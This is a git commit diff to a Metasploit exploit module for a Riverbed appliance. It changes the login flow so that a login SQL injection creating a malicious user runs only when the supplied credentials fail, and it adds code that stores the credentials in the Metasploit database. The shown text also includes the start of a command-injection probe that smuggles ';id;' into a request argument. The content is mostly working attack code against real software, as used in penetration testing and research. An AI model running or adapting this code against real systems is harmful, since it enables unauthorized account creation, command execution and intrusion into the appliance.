Added: support for credentials saving using report_cred method as suggested

Added: support for detection of valid user credentials to skip login SQLi if not necessary.
bug/bundler_fix
Francesco 2016-07-02 01:41:13 -04:00
parent 068a4007de
commit 4ed12d7077
1 changed files with 77 additions and 30 deletions

View File

@ -79,8 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
print_status("Creating malicious user through login SQLi")
create_user
print_status("Attempting log in to target appliance") print_status("Attempting log in to target appliance")
@sessid = do_login @sessid = do_login
@ -128,6 +126,83 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def do_login
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
# Exploit login SQLi if credentials are not valid.
if res && res.body && res.body.include?('<form name="login"')
print_status("Invalid credentials. Creating malicious user through login SQLi")
create_user
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
else
print_status("Valid login credentials provided. Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
end
return sessid_cookie
end
def report_cred(username, password)
# Function used to save login credentials into Metasploit database
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def create_user def create_user
# Function exploiting login SQLi to create a malicious user # Function exploiting login SQLi to create a malicious user
username = datastore['RIVERBED_USER'] username = datastore['RIVERBED_USER']
@ -180,34 +255,6 @@ class MetasploitModule < Msf::Exploit::Remote
return payload return payload
end end
def do_login
# Function used to login and create a valid session
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
if res && res.body && res.body.include?('<form name="login"')
fail_with(Failure::UnexpectedReply, 'Could not login')
else
print_status("Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
end
return sessid_cookie
end
def test_cmd_inject def test_cmd_inject
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;" post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"